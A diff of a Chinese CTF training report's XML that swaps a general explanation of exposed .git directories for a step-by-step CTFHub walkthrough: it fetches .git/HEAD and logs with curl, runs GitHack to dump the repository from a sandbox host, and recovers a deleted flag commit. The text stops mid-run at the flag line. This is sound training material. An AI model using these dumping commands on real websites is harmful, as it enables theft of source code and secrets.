--- a/task9-实战训练报告.docx
+++ b/task9-实战训练报告.docx
@@ -14,7 +14,7 @@
           <w:color w:val="1F3B63"/>
           <w:sz w:val="40"/>
         </w:rPr>
-        <w:t>CTF 实战训练报告 · task9</w:t>
+        <w:t>task9</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -44,7 +44,7 @@
           <w:color w:val="1F3B63"/>
           <w:sz w:val="30"/>
         </w:rPr>
-        <w:t>1.3 基础 Linux 命令（本次实战高频用到）</w:t>
+        <w:t>1.3 基础 Linux 命令</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1865,643 +1865,56 @@
           <w:color w:val="2E548A"/>
           <w:sz w:val="25"/>
         </w:rPr>
-        <w:t>2.2.1 Git 泄露</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>成因</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">：在 web 目录执行 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
+        <w:t>2.2.1 四道仓库泄露题</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="454"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:i/>
+          <w:color w:val="555555"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>git clone</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> / </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
+        <w:t>四道题的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:i/>
+          <w:color w:val="555555"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>git pull</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 部署，</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
+        <w:t>命令就是解法</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:i/>
+          <w:color w:val="555555"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>.git</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 留在 web 根。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`.git` 里有什么：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>全部源码（每个版本）</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>位置：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>objects/</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>危害：完整源码</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>全部提交历史</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>位置：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>objects/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> + </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>refs/</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>危害：开发过程、注释里的密码</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>未提交改动</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>位置：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>index</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>危害：暂存区敏感文件</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>被"藏起来"的改动</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>位置：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>refs/stash</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>危害：连 commit 都没进</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>被"删掉"的东西</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>位置：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>objects/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> + </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>logs/</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>危害：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>git rm</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 删不掉对象</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>四种变体与判据：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**Log</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">判据：reflog 有 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>remove flag</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>提取命令：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>git show &lt;add flag 的哈希&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**Stash</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>判据：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>refs/stash</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 200 / reflog 有 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>reset</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>提取命令：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>git stash show -p</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**Index</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>判据：index 与 HEAD 的 blob 差集非空</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>提取命令：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>git diff --cached</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**未删</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">判据：reflog 只有 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>init → add flag</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>提取命令：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>ls</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> + </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>cat</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>四条命令兜底（下载后各打一遍）：</w:t>
+        <w:t>。每段代码照抄即可复现，注释里标了每一步在干什么。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:color w:val="2E548A"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>题目 1 · Git Log（`.git` 泄露）</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2515,7 +1928,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>ls &amp;&amp; cat *.txt                       # 未删变体</w:t>
+        <w:t>T="http://challenge-41019ce7441deaee.sandbox.ctfhub.com:10800/"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2529,7 +1942,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>git log --all -p | grep -i ctfhub     # Log</w:t>
+        <w:t>curl -s "$T/.git/HEAD"              # ref: refs/heads/master</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2543,7 +1956,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>git stash show -p                     # Stash</w:t>
+        <w:t>curl -s "$T/.git/logs/HEAD"         # ← 关键的一步</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2557,25 +1970,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>git diff --cached                     # Index</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="40"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>万能兜底（不判断题型，扫全部对象）：</w:t>
+        <w:t>cd ~/tools/githack/GitHack-master</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2589,7 +1984,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)' \</w:t>
+        <w:t>python2 GitHack.py "$T/.git"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2603,7 +1998,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">  | awk '$1=="blob"{print $2}' \</w:t>
+        <w:t>cd dist/challenge-41019ce7441deaee.sandbox.ctfhub.com_10800</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2617,7 +2012,150 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">  | while read -r h; do</w:t>
+        <w:t>git show 4d330484</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="40"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>判据</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>logs/HEAD</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 里出现 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>commit: add flag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 和 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>commit: remove flag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 两行 → 取 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>add flag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 那一行的第二列哈希，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>git show</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 它。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>flag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
